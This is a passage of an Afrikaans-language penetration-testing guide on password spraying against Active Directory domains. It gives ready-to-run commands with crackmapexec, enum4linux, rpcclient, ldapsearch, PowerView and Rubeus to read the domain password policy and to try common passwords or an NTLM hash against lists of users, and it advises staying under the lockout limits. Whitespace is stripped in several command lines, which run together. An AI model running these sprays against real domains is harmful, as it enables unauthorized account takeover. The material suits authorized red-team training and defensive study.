Sodra jy verskeie geldige gebruikersname gevind het, kan jy die mees gewone wagwoorde probeer (hou die wagwoordbeleid van die omgewing in gedagte) met elkeen van die ontdekte gebruikers.
Standaard is die minimumwagwoordlengte7.
Let daarop dat jy sekere rekeninge kan blokkeer as jy verskeie verkeerde wagwoorde probeer (standaard meer as 10).
Kry wagwoordbeleid
As jy sekere gebruikersgelde of 'n skul as 'n domein-gebruiker het, kan jy die wagwoordbeleid kry met:
# From Linuxcrackmapexec<IP>-u'user'-p'password'--pass-polenum4linux-u'username'-p'password'-P<IP>rpcclient-U""-N10.10.10.10;rpcclient $>querydominfoldapsearch-h10.10.10.10-x-b"DC=DOMAIN_NAME,DC=LOCAL"-ssub"*"|grep-m1-B10pwdHistoryLength# From Windowsnetaccounts(Get-DomainPolicy)."SystemAccess"#From powerview
Uitbuiting vanaf Linux (of almal)
Deur crackmapexec te gebruik:
crackmapexecsmb<IP>-uusers.txt-ppasswords.txt# Local Auth Spray (once you found some local admin pass or hash)## --local-auth flag indicate to only try 1 time per machinecrackmapexecsmb--local-auth10.10.10.10/23-uadministrator-H10298e182387f9cab376ecd08491764a0|grep+
Met die scanner/smb/smb_login module van Metasploit:
Deur rpcclient te gebruik:
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/for u in$(catusers.txt); dorpcclient-U"$u%Welcome1"-c"getusername;quit"10.10.10.10|grepAuthority;done
# with a list of users.\Rubeus.exe brute/users:<users_file>/passwords:<passwords_file>/domain:<domain_name>/outfile:<output_file># check passwords for all users in current domain.\Rubeus.exe brute/passwords:<passwords_file>/outfile:<output_file>
Met Invoke-DomainPasswordSpray (Dit kan standaard gebruikers van die domein genereer en dit sal die wagwoordbeleid van die domein kry en pogings beperk volgens dit):